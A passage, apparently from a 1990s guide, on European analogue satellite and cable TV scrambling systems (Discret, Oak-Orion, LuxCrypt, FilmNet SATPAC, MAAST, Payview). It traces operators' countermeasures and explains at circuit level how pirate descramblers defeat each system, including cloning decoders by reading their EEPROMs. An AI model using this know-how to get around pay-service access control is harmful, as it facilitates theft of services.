is represented by 0V4 and -0V4. Logic 0 is represented by OV. 


The operation of the duobinary decoder is extremely simple. In theory, it 
consists of two comparators, an EXOR gate and an inverter gate. The 
duobinary signal is fed to the two comparators. One comparator slices the 
signal at the upper level. The second comparator slices the signal at the 
lower slicing level. The outputs of the comparators are fed to the EXOR 
gate. The output of the EXOR gate is inverted by the inverter gate and the 
original bitstream is restored. 


The data slicer is generally on the integrated circuit rather than being 
discrete circuitry. 
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Case Study: The RITC Discret 1 System 


Video Scrambling: Video Line Delay. 


The video information in each line is delayed by one of three delays; 0, 902 
nS or 1804 nS. These delays are applied on a pseudo random basis so that 
the scrambled video takes on a ragged form. 


Audio Scrambling: Spectrum Inversion. 


The audio is spectrum inverted around a 12.8 KHz carrier. This carrier 
frequency is derived from the system clock in the official descrambler. 


Users: Canal Plus France (switching to Syster), MMDS/ 
Cable. 


In November 1984, Canal Plus started transmission using the Discret 1 
scrambling system. The system was unwisely proclaimed as being hacker- 
proof. At first glance, there was good reason to believe in its security. The 
official descrambler used custom integrated circuits and was microproces- 
sor controlled. Individual descrambler could be turned on or off by the 
headend. So what went wrong? 


In the December 1984 issue of the French “Radio Plans” magazine, there 
was an article on how to construct a pirate descrambler for Canal Plus. 
Naturally the people at Canal Plus were not pleased. They took legal action 
against the magazine and were successful. The magazine was seized by 
the court. It was decided that the “Radio Plans” design did not infringe the 
patent but it was an incitation to theft. Enough photocopies of the article 
were circulated so that anybody who wanted them could get them. The 
problem was compounded by the fact that a Paris newspaper published the 
article. Things are now very different in France. Piracy is a serious offence. 
Of course while this has limited the problem, it has not eliminated it. 


The Discret system existed before Canal Plus decided to use it. It was 
primarily used for the ТУ5 links to Tunisia. When it was being used for that 
application, there was very little piracy because there were very few pirates 
with the necessary satellite reception equipment. The Canal Plus situation 
involved the use of terrestrial transmitters and as such the signal was widely 
available. 


The Discret system is a dual facility system. It scrambles the video and the 
audio. Most of the systems before Discret affected the synch pulses and 
sometimes the audio. The Discret system actually processed the video. It is 
primarily a baseband scrambling system. The RF signal has to be 
demodulated and turned into composite video and audio before it can be 
descrambled. 
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The RITC Discret 1 System 
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The advent of the SCART or Peritel socket ensured that the hookup of the 
descramblers would be efficient. Under French law all colour televisions had 
to have a SCART socket. Two types were manufactured; an RF type and a 
baseband type. The RF type had its own tuner and remodulator. It was 
primarily intended for use with televisions that predated SCART sockets. 
The baseband descrambler would connect directly to the SCART connector 
on the television. The television's tuner/demodulator circuit would provide 
the descrambler with composite video and audio. The descrambler would 
descramble the signals and return the clear video and audio signals to the 
television. 


The video scrambling on the Discret system is known as "line delay". The 
active video section of each line is pseudo-randomly delayed by one of 
three delays; 0 nS, 902 nS or 1804 nS. This type of scrambling gives the 
video a very ragged look on the screen. The entertainment value of the 
picture is not totally destroyed. 


The audio scrambling used is "Spectrum Inversion". The audio spectrum is 
rotated about a carrier frequency. This makes the audio sound like Donald 
Duck on LSD. The lack of audio on the scrambled Discret signal destroys 
the entertainment value. 


The sequence of delays is not random but pseudo-random. It repeats after 
six fields. The official descrambler required the customer to type in a pass 
number. For the first month, any number would work. After that, the 
customer's own pass number would only work on his own descrambler. The 
"Radio Plans" design did away with all of that complexity. Of course the 
simplicity of the "Radio Plans" circuit made it easy to for Canal Plus to 
counter. 


The rise from black level to the start of active video was detected. A time 
slot or window circuit was used to check where the active video started. 
Three slots were used. If the active video started in the first slot, then the 
video was not delayed. If it started in the second slot, the video was delayed 
by 902 nS. If the video started in the third slot, then the video was delayed 
by 1804 nS. 


The "Radio Plans" design ensured that all of the lines of video had 1804 nS 
delay. This was, in principle, a simple operation. If the video was not 
delayed, then it was passed through an 1804 nS delay. If the video was 
delayed by 902 nS, then the video was passed through a 902 nS delay. If 
the video was delayed by 1804 nS, then it was passed without introducing 
any delay. 
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The main problem of descrambling the signal lay in delaying the video. A 
simple solution was found. A colour transient improver IC, the TDA4560, 
was used. This IC had a gyrator delay line that could provide an 888 nS 
delay. Two of these ICs were used in the design. The IC naturally became 
difficult to obtain. Glass delay lines and even LC delay lines were tried. 


The method of operation of the “Radio Plans” design made it easy to defeat. 
Canal Plus injected a level other than black into the delay area. This fooled 
the start of video detector circuit into thinking that the video was not 
delayed. As the expertise of Canal Plus grew so did that of the hackers. 


The fixed level modification to the system was easily overcome by the 
hackers. Since the level of the signal injected into the delay area was 
constant, a comparator circuit was used to detect it. An EXOR logic gate 
was then used to check if it was a flat level such as black, grey or white. Of 
course the addition of a noise burst instead of a level fooled the comparator 
circuitry. 


Some hackers departed from the “Radio Plans” design and developed 
microprocessor based descramblers. These descramblers detected the 
start and end of the six field sequence. When the sequence changed each 
month, the microprocessor would “learn” the new sequence. This is the 
format that many of the pirate descramblers now use. Even these 
descramblers now have a limited lifespan. 


One ECM that hit most of the microcontroller based descramblers was the 
“False Flag” ECM. The following explanation is a simplified one. The end of 
a sequence is clearly flagged in a Discret signal. The descramblers used 
this to lock or initialise their “learn” routines. 


Under ordinary circumstances, the sequence was six fields in length. A 
sequence flag should therefore appear every six fields. A false flag is where 
the end of sequence flag appears when it shouldn't. This caused the pirate 
descrambler to initialise when there was no need to. The sequence length 
was also changed. 


Hacker Descrambler Operation 


The video signal is passed through three buffer amplifiers, two delay lines 
and a multiplexer. A smattering of logic circuitry is used to preserve the 
synch signals and the color burst. The video signal is also fed to the start of 
video detector. This circuit detects the rise from black level at the start of the 
video information. The output of this circuit is fed to a logic circuit called the 
delay detector. By using a series of monostables triggered by the line synch 
pulse, the delay is checked by determining the period in which the video 
starts. The period of each monostable is 902 nS. The output from this circuit 
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controls the multiplexer. If the signal has zero delay, then it is fed through 
the two delay lines. If the signal has a one unit delay, (902 nS), then it is fed 
through one delay line. If the signal has two unit delay then it is fed straight 
to the multiplexer. The descrambler ensures that all the lines have a two unit 
delay. This produces a black line at the left hand margin of each frame, 
though it is generally lost in the overscan with most televisions. 


The “Radio Plans” descrambler has an inherent weakness in that it relies on 
the detection of the rise from black level to start of video in each line. If the 
delay was filled with a level other than black, then the "Radio Plans’ 
descrambler would not work. This is precisely what Canal Plus did in an 
early ECM. 


Other Information 


The Discret 12 system is a digital based system. The video has to be 
digitised in order to scramble and unscramble it. The delays are introduced 
into the digitised video using digital shift registers. 


One of the more innovative pieces of circuitry in a hacker design digitised 
the first few microseconds of each line and uses the digitised information to 
detect a delay. The pre start of video section of each line is sampled a 
number of times. The width of each sample corresponds to the smallest 
delay time. If the byte does not correspond to the converted equivalent for 
black level, usually 00000000 binary, the video has started. This is checked 
using an eight input NAND gate. There are two ways in which the 
descrambler can clock out the digitised video. The existing line can be 
delayed to match up with the most delayed line as in the Discret 1 
descrambler or the video can be delayed until what would be the next line 
period and then clocked out and converted to analogue at the correct time. 
While the detection method above is reliable, it was not widely used on the 
majority of the Discret descramblers. 


The Discret system is inherently insecure and most of the upgrades have 
been hacked within a very short time. The most common upgrade is to 
change the sequence of the delays and fill the delays with non-black levels. 
The main problem that the system faces is that the pirate descramblers are 
“clever” in that they can ascertain the delay sequence. 


In Ireland, Cablelink actually used this system for a while. They did not like it 
and found it unreliable. The descramblers that they were supplied with 
appeared to be models converted from the original French types. 


Given that Canal Plus in France is dumping this system, there will be a lot of 
second hand descramblers on the market. The low prices of this equipment 
will inevitably make the system attractive to cash poor cablenets. However it 
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would be downright stupid for anyone to use this system given the available 
hacker knowledge and expertise that is available. 


There are rumours that a few of the MMDS franchises in Ireland are 
considering adopting Discret. The rationale being that there is a strong legal 
framework to protect them. This over reliance on legal safeguards is both 
stupid and dangerous. While the system might initially protect the franchise 
from hacking, it is a liability when considered in а long term light. 


The most dangerous aspect of the Discret decoder is that the critical 
addressing data is held in an EEPROM that can easily be read. The 
programs to read the EEPROM are commonly available on BBSes and the 
Internet. It is not exactly a difficult task. 


The flaw of unprotected critical data was common in systems designed in 
the early eighties. Once the contents of the EEPROM can be copied, it is 
possible to create a set of cloned decoders merely be reprogramming the 
other official decoders with the same data. Naturally the programme 
provider could find out about the clone master and knock the clone network 
out. 


Case Study: The OAK Orion System 


Video Scrambling: Horizontal and vertical synch 
replacement, random or sequential field or line inversion. 


The usual horizontal and vertical synch pulses are removed from the 
scrambled video and replaced with 2.5 MHz bursts. The video on each line 
can be inverted or normal polarity. A pulse situated just before the start of 
video in each line indicates the polarity of the video. The inversion can take 
place on a line, field or frame basis. 


Audio Scrambling: Digital audio with encryption facilities. 


The audio is digitised and compressed. The digital audio samples are then 
inserted into what would normally be the horizontal blanking interval. 


Users: Sky Channel. (1982-1987) 


The Orion of Oak-Orion stands for Oak Restricted Information and 
Operation Network. The Oak-Orion scrambling system is a lot more secure 
than most hackers seem to think. In Europe, SKY has been the only satellite 
service to use this system. The minimum security level has been used for 
this application as SKY was not really a PAY-TV station in the true sense. 
The audio facility on the waveform was not used on SKY as monophonic 
and stereo subcarriers were transmitted with the signal. 
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Six possible inversion modes can be used in the system. One of four video 
inversion modes can be used during each field; inversion on odd lines, 
inversion on even lines, all inverted or no inversion. The control sequence 
for this option is to be found in line twenty-two. The Oak-Orion system is 
patented and the original patent application, (No: US 4353088), also 
includes two further options. The voltage level of the digital packet in each 
line could be shifted or alternatively it could be varied by a sinewave gated 
to vary the levels in the horizontal blanking period. 


Variants of the system are still in use. It is however being replaced by more 
secure systems. As it dated from the early eighties, the system was 
remarkable for the amount of security it offered. It was let down by the fact 
that it could be hacked by replacing an EPROM. 


Hacker Descrambler Operation: 


The simplest hacker descramblers detect the 2.5 MHz synch bursts and 
use a number of monostables to recreate the line and frame synch signals. 


The average hacker descrambler consists of the following blocks; an 
inverting video amplifier, а 2.5 MHz synch burst detector, schmitt trigger 
inverters, line synch monostables, an integrator, a frame synch monostable 
and a synch re-insertion circuit. A number of circuits can be used for the 2.5 
MHz synch burst detection. These can vary from a diode detector to a video 
demodulator IC operating at 2.5 MHz. The synch re-insertion circuit can 
either be a CMOS switch type or a transistorised type. 


Every line has an inversion bit preceding the video information. If the 
inversion facilities were ever to be used, then the hacker decoder would 
have to sample this bit and use a multiplexer prior to the synch re-insertion 
circuit to switch between positive and negative polarity video. 


A descrambler for this system is covered in the Pink And Brown Book. It is a 
very elaborate method of descrambling the signal. A generic descrambler or 
synch generator Unfortunately this system is no longer in use on satellite 
links in Europe. It would have been easy for Sky to have defeated the 
hackers by introducing another level to the systems as the hacker 
descramblers that were used were crude and simple in design. 


There is no information in Europe to suggest that the digital audio was 
hacked. The primary reason for this non-event was the availability of an 
unscrambled audio subcarrier. Elektor Electronics magazine published a 
video descrambler design for ORION in early 1987. The timing was 
unfortunate as Sky dropped the ORION system shortly after the article was 
published. 
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Typical Hacker Descrambler Block Diagram 
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Case Study: The LuxCrypt System 


Video Scrambling: Horizontal and vertical synch 
replacement, random or sequential field or line inversion. 


The usual horizontal and vertical synch pulses are removed from the video 
and replaced with 5.72 MHz bursts. The video on each line can be inverted 
or normal polarity. The inversion can take place on a line, field or frame 
basis. 


Audio Scrambling: Digital audio (unused). 


The audio is digitised and compressed. The digital audio samples are then 
inserted into what would normally be the horizontal blanking interval. Only 
two bytes of the three byte data burst are used for digital audio. The other 
byte is used for synch information and perhaps line polarity information. 
This digital audio facility is not used in the LuxCrypt implementation. 


Users: RTL4-V 


This system is in some ways similar to the forerunner of the ORION system. 
The primary difference between the LuxCrypt as used on RTL-4V is the lack 
of the 2.5 MHz synch burst. This means that a pirate ORION descrambler 
will not work on this system without modification. 


The primary reason for the use of this system by RTL4-V is copyright. 
RTL4-V does not have European copyright for some of the programmes 
shown on the channel. 


The video inversion can be based on the amount of white or black in the 
scene. This type of inversion is known as average peak level or APL, 
pronounced “apple”. These inversions take place on a three second basis. 


The APL inversion was introduced in January 1990. The effect on the 
pirates was significant. Many of the commercial pirates had completed their 
designs and were oblivious to the fact that the APL inversion facility existed. 
Many were getting ready to ship their completed descramblers to waiting 
customers when RTL-V struck with the upgrade. This turn of events added 
at least another month to delivery dates. 


RTL4-V uses polarity inversion on a random basis. To date this has only 
been on a field basis rather than a line basis. The aim is to upset the simpler 
decoder designs. Most of the RTL4-V pirate descramblers are not affected 
as they are actual clones of the official model. 
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Hacker Descrambler Operation: 


The simplest hacker descramblers detect the 5.72 MHz synch bursts and 
use a number of monostables to recreate the line and frame synch signals. 
Other versions detect the color burst in each line and count the number of 
color bursts to trigger the field pulses. 


The average hacker descrambler consists of the following blocks; a video 
amplifier, a 5.72 MHz synch burst detector, schmitt trigger inverters, line 
synch monostables, an integrator, a frame synch monostable and a synch 
re-insertion circuit. A number of circuits can be used for the 5.72 MHz synch 
burst detection. These can vary from a diode detector to a video 
demodulator IC operating at 5.72 MHz. The synch re-insertion circuit can 
either be a CMOS switch type or a transistorised type. 


To hack the inversion facilities the hacker decoder would have to sample 
the white level - black level line in the Vertical Interval Test Signals. The 
condition of this line would indicate the polarity of the field. The polarity 
sample is then used to control a multiplexer which switches between 
positive and negative polarity video prior to the synch re-insertion circuit. 


This can be defeated by the use of a byte of the digital information to control 
a line based inversion. This is possible though it is unknown if this option will 
be used on the RTL-V implementation. 


Apparently this system has been adopted by RTL5 though this implementa- 
tion uses APL. As a result some of the old pirate designs do not work. 
However the XV2000 design has been reported as still working. 


2: The Principles Of Security 


Case Study: Sound In Synch - EBU Format 


Video Scrambling: Digital Sound In H. Synch 


The video in the EBU sound in synchs system is not actually scrambled. 
Because the digital audio is inserted into the horizontal blanking interval, the 
synch stripper in the television can be confused. The picture appears 
ragged and at times can lose line stability. 


Audio Scrambling: PCM With Crypto 


The audio in this system is digitised and encrypted. In some cases the audio 
is unencrypted but a digital demodulator is required. 


Users: European Broadcasting Union 


The EBU format system is designed to optimise the satellite power. On a 
normal satellite transmission, the audio is transmitted on a subcarrier in the 
range 5 MHz to 8 MHz. This consumes some of the available power. The 
EBU system economises by putting the audio in the video waveform. This 
means that the EBU transmission format is essentially only a video 
waveform. As a result, the power that would have been used for an audio 
subcarrier can now be used for the video. This gives a better CNR. 


There are rumours that the EBU are considering a switch to Nagra Kudelski 
Syster. The aim of this is to stop the piracy of the signals. Of course these 
rumours have been floating around for about six years now and nothing has 
really happened. 


Hacker Descrambler Operation: 


There is not a great demand for a hacker descramblers for this system. A 
combined video descrambler - audio decoder was developed by a Dutch 
firm and marketed within the last two years. 


The video on the other hand is easily hacked. It merely involves replacing 
the horizontal synch pulse area in the scrambled signal with a new properly 
timed horizontal synch pulse. 
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Case Study: Standard Electric Lorentz PCM2 


Video Scrambling: Shortened H. Synch Pulse 


The video in the SEL system is not actually scrambled. The horizontal synch 
pulse is shortened from 4.7 uS to approximately 1 uS. This causes the 
television synch circuitry to lose line lock. The frame pulses are untouched 
and as a result, the picture may lock vertically but it will not have total 
horizontal lock. 


Audio Scrambling: Digital Audio. 


One audio packet is placed after the shortened horizontal synch pulse. The 
other audio packet is placed after the color burst. 


Users: Defunct 


The SEL PCM2 system has two main differences from the EBU system. 
The digital audio is placed in the line blanking interval at two points; one 
packet before the color burst and one packet after the color burst. When the 
system was in use in Europe, the second packet was rarely used. The 
second difference was the use of a shortened line synch pulse. This pulse 
was shortened to approximately one microsecond. 


Hacker Descrambler Operation: 


The video section of the SEL PCN2 is relatively easy to descramble. The 
hacker descrambler uses the shortened horizontal synch pulse to trigger a 
properly dimensioned horizontal synch pulse. This new synch pulse is then 
inserted into the scrambled waveform in place of the shortened synch pulse. 


A standard synch stripper can be used. The stripped synch is fed to a 
monostable set to give a 4.7 uS pulse. The 1 uS synch pulse is also used to 
trigger a set of gating monostables to gate the digital audio to the 
demodulator. The digital audio levels are between black level and white 
level. This implies that the signal should be well clamped prior to 
descrambling. Sometimes if the clamp is badly designed, the shortened 
synch pulses can be damaged. 


At the present, the SEL PCM2 system is not being used in European 
satellite broadcasting. According to available information, the audio was not 
hacked. 
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Case Study: The Old FilmNet System - SATPAC 


Video Scrambling: Synch Shifting. Sequential Field Video 
Inversion 


Audio Scrambling: Modified NICAM With Crypto 
Users: FilmNet Greece though otherwise defunct 


The Filmnet / SATPAC / Matsushita system was first used on Filmnet on 
01/Sept/1986. Up to that point in time, the channel was one of the most 
popular film channels available in the clear on satellite in Europe. As a result 
of the scrambling, the system became overnight the prime target for 
hackers in Europe. It could be argued that FilmNet was the channel that 
created the initial pan-European Blackbox industry. And the primary 
motivation of the viewer? FilmNet was transmitting porn that was unavail- 
able in some countries in Europe. 


The SATPAC system is perhaps one of the best examples of what happens 
to a system originally designed as a cable television system when it is 
converted to satellite use. It was utterly gutted by hackers so much so that 
even the film providers were getting worried at the state of piracy on the 
channel. 


While this system has ceased operation on the main FilmNet satellite 
transmission on ASTRA, it has been spotted recently on another FilmNet 
feed to Greece. It seems that most systems like this are pressed into use on 
small operations sooner or later. It is still used on cablenets throughout 
Europe. 


The reason that this case study is still included in the Black Book is because 
it is a good illustration of an analogue satellite scrambling system being 
used on satellite. It is also a good example of why analogue scrambling 
systems on satellite are doomed to failure. 


The SATPAC system is old. It is from the same generation of systems as 
Payview and the cable based Jerrold Tri-Mode. Like these systems, it 
initially relied on interfering with the synch pulses and inverting the video. Of 
course the abject piracy on the analogue video scrambling aspect forced 
FilmNet to implement a digital audio encryption system as an add-on. It was 
of course a stupid path of action as a totally compromised system, 
especially one where there is analogue scrambling, has to be replaced. 


The scrambling technology of the early eighties was based on interfering 
with the synch section of the video line and inverting the video on a 
pseudo-random basis. The SATPAC was not that different from many of the 
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systems of that era. It interfered with the polarity of the video and the level of 
the horizontal blanking intervals. 


The first level of Filmnet was employed from 01/Sept/1986 to 23/Mar/1987. 
The first phase was extremely simple to hack and there was a booming 
market in pirate or blackbox descramblers. The upgrade that occurred on 
23/March/1987 dented the market. It was an easy hack. The video in each 
alternate field was inverted. The effect on the pirate market was devastat- 
ing. The upgrade went into operation a few days before one of the largest 
European satellite shows, Cable And Satellite 1987. This rendered many of 
the demonstration models useless. 


The Filmnet system was upgraded over Christmas 1989. The upgrade took 
place over a few days. The system was fully updated by 24/12/89. It was the 
worst possible Christmas present for pirate descrambler owners and 
manufacturers. Many of the pirates were working over the holiday period in 
order to get their stock upgraded. The impact of the upgrade was 
considerably less than that of March 1987. Many of the pirate descramblers 
were not eliminated. Those that were affected were quickly upgraded and 
the estimated effective lifetime of the upgrade is two weeks. Most pirates 
took advantage of the holiday period and as such had working descram- 
blers ready for January 1990. 


At the end of January 1990, FilmNet switched back to the two field 
sequence with rather nasty effects for some pirate descrambler manufactur- 
ers. They had hardwired the descrambler upgrades for the four field 
sequence. The descramblers did not work after the downgrade. This 
produced a lot of angry customers who wanted their money back. Some 
pirate descrambler manufacturers were bankrupted as a result. 


It seems that FilmNet, in desperation, went for a digital audio system. What 
they did not seem to understand was that the Blackbox industry had 
reached such a size and level of expertise in Europe, that the digital audio 
system was inevitably going to be hacked. 


When FilmNet introduced their digital audio in 1991, it effectively nuked the 
market. It did not have the effect that FilmNet had hoped for. Instead of 
killing off every pirate manufacturer it only killed off the smaller firms. The 
larger firms concentrated on hacking the digital audio. Hi Tech actually had 
the FilmNet digital audio ASIC reverse engineered and after examining it 
created a new one. The Hi-Tech ASIC and decoder actually outperformed 
the official FilmNet digital audio decoder. 
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Hacker Descrambler Operation: 


A number of methods were used by the hackers to descramble the FilmNet 
signal. The commonest were; synch recombination using triggered monos- 
tables, synch recombination using a PLL and synch regeneration. We will 
only use the triggered monostable design as an example. 


The first level that FilmNet used was an inverted line and suppressed 
horizontal blanking interval. 


The composite synch signal for the Filmnet system was transmitted on a 
carrier at 7.56 MHz. This carrier was demodulated using an FM demodula- 
tor typically based on the TBA120 chip. On cable versions of this system, 
this carrier is Amplitude Modulated on to the FM audio subcarrier. 


After demodulation This composite synch signal is split into frame synch, 
(using an integrator), and line synch. The first two line monostables phase 
the line synch with the synch position in the scrambled video. 


A noise gate is used to the detect the horizontal synch interval in the 
scrambled video. The output of the noise gate is ANDed with the phased 
line synch. This gives a correctly timed trigger line synch pulse. 


The trigger pulse is fed to two monostables. These first monostable delays 
the pulse by 52 uS. The delayed pulse is then used to trigger the second 
monostable. This monostable generates a pulse the approximate width of 
the horizontal blanking interval. This pulse is used to pull down or shift the 
horizontal blanking interval in the scrambled video back to the unscrambled 
level. 


Upgrade 1 - 23/03/1987 


This was the first time that FilmNet had used the field based inverted video 
option. The video was inverted in each alternate field. On most of the pirate 
descramblers, this simple upgrade was devastating. The PCBs and 
generally the over all circuitry of most of the pirate descramblers were not 
designed with this in mind. The information available on the system was, to 
say the least, iffy. 


The hacker response was to use a multiplexer to switch between the 
inverted video and normal video outputs of a differential output amplifier. 
The frame pulse was divided by two using a flip flop. This meant that the 
output of the flip flop changed polarity once every field. 


The actual flip from normal to inverse video did not take place at the exact 
end of one field. This meant that the frame pulse had to be slightly delayed 
by a monostable before being used to trigger the flip flop. 
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Upgrade 2 - 24/12/1989 


The SATPAC system had more than one level of field inversion sequence. 
Most of the hackers had, in their eagerness to overcome the alternate field 
inversion, neglected to make their solution capable of handling anything 
other than an alternate field inversion. FilmNet exploited that weakness by 
going for a four field based inversion sequence. The fourth field was normal 
polarity and the other three fields were inverse polarity. The pattern could be 
produced using two flip flops and an AND gate. The first flip flop divided the 
50 Hz field frequency by two to give a 25 Hz square wave. The second flip 
flop divides the 25 Hz square wave by two to produce a 12.5 Hz square 
wave. The 25 Hz square wave and the 12.5 Hz square wave were ANDed. 
This produced a signal that went high on every fourth field. A NAND gate 
can also be used. 


FilmNet returned to the two field sequence in late January 1990. The aim of 
this upgrade was to cause maximum confusion among the pirates. It 
achieved that goal but by this time, most of the pirate descrambler designs 
had incorporated elements of polarity detection. This meant that the field 
inversion was no longer such a good option. 


Upgrade 3: 5/11/1990: 


Some of the pirate designs relied on measuring the voltage difference 
between the horizontal synch pulse tip and the blanking level to ascertain 
the polarity of the video. This was an exploitable weakness. 


FilmNet inserted a low level high frequency sine wave burst into the 
horizontal synch pulse tip. The frequency of the sine wave was approxi- 
mately that of the colour subcarrier. This had two consequences. It upset 
descramblers that used the colour burst to lock on. They saw two properly 
timed, (relative to one another), colour bursts. It also affected descramblers 
that determined the video polarity by comparing the level of the synch tip 
with the horizontal blanking level. 


This upgrade had the most widespread effect in the Blackbox industry. It 
was expected by some of the veteran manufacturers but some of their 
descramblers were mildly affected. It was generally a case of adding one or 
two components to the board as they had designed their descrambler with 
this upgrade in mind. The more recent additions to the industry were nearly 
obliterated by the upgrade - much to the amusement of the veteran pirates. 
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Upgrade 4: December 1990: 


In December 1990, FilmNet started to vary the amplitude of the burst in the 
horizontal synch pulse by amplitude modulating the burst with a very low 
frequency, 1 Hz, wave. The logic behind this was clever. Most of the synch 
tip sampling descramblers had placed a very low value capacitor, typically 
100pF into the comparator circuit to filter out the burst in the synch tip. The 
low frequency would remain after the 100pF capacitor had filtered out the 
burst. This varying level would cause problems for the comparator as it was 
forced to interpret a signal as being inverted when it was actually normal 
polarity. 


Upgrade 5: January 1991: 


The first level of the SATPAC system is suppressed synch and no inversion. 
In January 1991 FilmNet switched off the inversion. This move, surprisingly, 
took out a few of the better pirate descramblers on the market. It did not 
affect the descrambling section of the descramblers but rather the 
autoswitching circuitry. Many of these descramblers used the inverted 
synch pulses in the scrambled video signal to trigger the descrambler into 
operation. Since there were no inverted synchs, the descrambler interpreted 
the signal as being clean. 


Upgrade 6: March 1991: 


By March 1991, the complexity of pirate descramblers was exceeding that 
of the official descramblers. The pirate designs were based on programma- 
ble logic arrays and other customisable chips. Most of these designs were 
colour burst lockers. They used the colour burst in the scrambled video to 
synchronise what effectively was a complete horizontal and vertical synch 
generator. 


In March 1991, a sequence of colour bursts was placed in the vertical 
synch. These prolonged bursts confused the burst counting circuitry in 
some of the colour burst locking descramblers. The result was that the burst 
counting pirate descramblers did not know where to put the vertical synch. 
This resulted in the picture rolling on the screen. Many of the descramblers 
on the market could be tweaked by the user to overcome the problem. 


Upgrade 7: March 1991 


While the previous upgrade was aimed at the more sophisticated pirate 
descramblers, a large section of the pirate descrambler market was still 
using designs that relied on the 7.56 MHz composite synch carrier 
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transmitted by FilmNet. FilmNet's answer was the Double Glitch modifica- 
tion. 


The double glitch modification inserted a second pulse adjacent to each 
pulse. This was intended to unlock PLLs. The modifications generally 
involved disabling the pulse detection after the end of the first pulse. This 
was achieved with a monostable and multiplexing circuit. 


Upgrade 8: June 1991 


Digital audio was introduced. This was the end of an era. The pirate 
descrambler market created by the launch of ASTRA disappeared over the 
space of a year. Only Hi-Tech Extravision marketed a pirate digital audio 
decoder. 


Upgrade 9: September 1992 


FilmNet ceased PAL transmissions via ASTRA switching to D2-MAC 
EuroCrypt-M in the hope that it would solve all of their piracy problems. In 
the final reckoning, it was the worst move they ever made and they made 
some bad ones. 


Case Study: Telease MAAST / Sat-Tel SAVE 


Video Scrambling: Sine wave interference. Video inversion. 
Video amplitude reduction. 


The video in the scrambled signal is reduced by 3dB, (6dB in Europe), 
inverted and has an interfering sine wave added. The frequency of the sine 
wave is approximately six times the horizontal raster frequency, (15625 Hz x 
6 = 93750 Hz). 


Audio Scrambling: Spectrum Inversion. 


The carrier is derived from the frequency of the interfering sine wave. The 
sine wave frequency is divided by six to generate the carrier. 


The MAAST system was developed by Telease of California. It was 
manufactured and marketed in Europe by Sat-Tel, a now defunct UK 
company. The system is essentially a low security type. 


The system reduces the amplitude of the video signal, inverts it and adds a 
sine wave. The sine wave is close in frequency to the sixth harmonic of the 
line frequency. This ensures that any attempt to filter out the interfering sine 
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wave and antiphase it with the scrambled video will leave a beat frequency 
patterning on the descrambled video. The reason for this is that the sixth 
harmonic of the line frequency is also pulled out by the filter. 


The level of video reduction differs. The US version reduces the video by 3 
dB and the European version reduces the video by 6 dB. This difference is 
primarily related to the transponder bandwidth. The US version typically 
operates in a 36 MHz bandwidth and the European version in a 30 MHz 
bandwidth. 


While the system has fallen into relative disuse in the US and Europe. The 
now defunct English movie channel, Premiere used it. The hybrid form of 
BBC transmitted on the Intelsat at 27.5 degrees West used a combination 
of frequencies that were selected at random. However this was not enough 
to prevent the system from being utterly hacked. 


Hacker Descrambler Operation: 


The basic hacker descrambler uses a voltage controlled crystal oscillator 
running at 64 times the frequency of the interfering sine wave. It is 
essentially a phase locked loop circuit. The VCXO increases the cost of the 
actual descrambler. Various low cost alternatives have been employed. 
One of the best of the European hacker designs used a 6.0 MHz ceramic 
resonator. 


The MAAST / SAVE system has an audio scrambling facility. This facility 
was used in the US version but did not see widespread use in Europe due to 
the common use of stereo subcarriers. In the standard audio scrambling 
facility, the audio spectrum is rotated around a nominal 15 KHz carrier. The 
carrier used for the rotation is generally one sixth the frequency of the 
interfering sine wave and is derived by dividing the output of the PLL. 


The BBC SAVE audio scrambling facility was more complex. It is based on 
Spectrum Shifting rather than inversion. As a result the descrambler was 
more complex. A possible circuit for a Spectrum Shift scrambler and 
descrambler was published in the October 1991 issue of Elektor Electron- 
ics. 

The BBC form of the video scrambling used a number of frequencies for the 
interfering sine wave. This allowed the operator to switch between the 
frequencies. The switch generally occurs in the time when the transponder 
is not carrying video. Most of the pirate descramblers that were used for the 
original single frequency system required a complete upgrade. The com- 
monest form was the introduction of a new crystal and a switch. The 
cheaper and more versatile use ceramic resonators 
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The last channel to use the system in Europe was Red Hot Dutch. They 
were aware of the insecurity of the system and intended only using it as a 
stopgap system. The crystal frequency used in their variant is that of the 
8085 system clock. Since this frequency divides down to 96 KHz, it does not 
take advantage of the strength of the SAVE system. The frequency of the 
interfering sine wave is meant to be close to the sixth harmonic of the line 
frequency so that beat frequencies are produced. The 96 KHz sine wave is 
too far away from 93.750 KHz for serious amplitude beat frequencies. 
Therefore some people achieved watchable pictures by inverting the video. 


It is unlikely that this system will ever see use on satellite again. It is just too 
insecure but then again there are a lot of stupid people in channel 
management. 


Case Study: Payview III 


Video Scrambling: Synch modification, pseudo line delay, 
video inversion. 


The horizontal blanking interval is raised above peak white level. This 
confuses the television receiver automatic gain control and clamping 
circuitry. When the scrambled video is displayed on a television set, the 
picture appears dark. The horizontal synch pulse is dithered or rapidly 
shifted in time. This causes a pseudo line delay effect on the scrambled 
video. The line video can be inverted on a sequential or random basis. 


Audio Scrambling: Digital, but not used over satellite. 
Users: Only On Cable 


The Payview ІІІ system was first tested via satellite for the now deceased 
Spanish Canal 10. This system was not eventually chosen for use on the 
channel. 


Teleclub were testing this system sporadically throughout 1988 and 
introduced it in 1989. The system was employed in its basic form; alternate 
line inversion and no pseudo random line delay. This level was quickly 
hacked and pirate descramblers flooded the market. 


The system was not difficult to hack in its basic forms. The random line 
inversion would prove more of a problem. The raised horizontal blanking 
section caused problems with some types of satellite receivers. The main 
problem occured with receivers with inadequate bandwidth. The Teleclub 
satellite transmission format used a 36 MHz transponder bandwidth. Some 
hackers tried to receive the signal using an poorly converted ASTRA 
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bandwidth, (26 MHz), receiver. This caused a problem with the color burst 
which appears to be suppressed or attenuated. However Teleclub over- 
came this problem eventually. 


When the system used a rapid form of video inversion, most of the pirate 
descramblers on the market were knocked out. In the majority of cases, it is 
simply a case of an out board modification. Of course given the nature of 
the Blackbox business as it was then, by the time the modification 
appeared, some of the pirate manufacturers had gone bankrupt. 


With Teleclub's switch to Nagra Syster, the Payview system fell out of use 
on satellite. However it is still used in Europe on some cablenets. 


Hacker Descrambler Operation 


The original level of PayView was a very easy hack. The simplest 
descrambler relied on detecting the rise to above peak white. A comparator 
was used. The actual circuit is given as the Pseudo Line Delay Detector 
circuit in Chapter 3. 


The rise to above peak white voltage was used to trigger a set of 
monostables. The monostables generated the properly timed synch and 
blanking level pulses. These pulses were used to gate a "pull down" down 
circuit and a synch reinserter. The "pull down" circuit restored the colour 
burst to its proper voltage level. The synch reinserter replaced the blanking 
and synch pulses. 


The use of a synch reinserter was a necessary safeguard. Since many of 
the original pirate descramblers used the negative going transition of the 
horizontal synch pulse to lock on, they were nuked by the introduction of the 
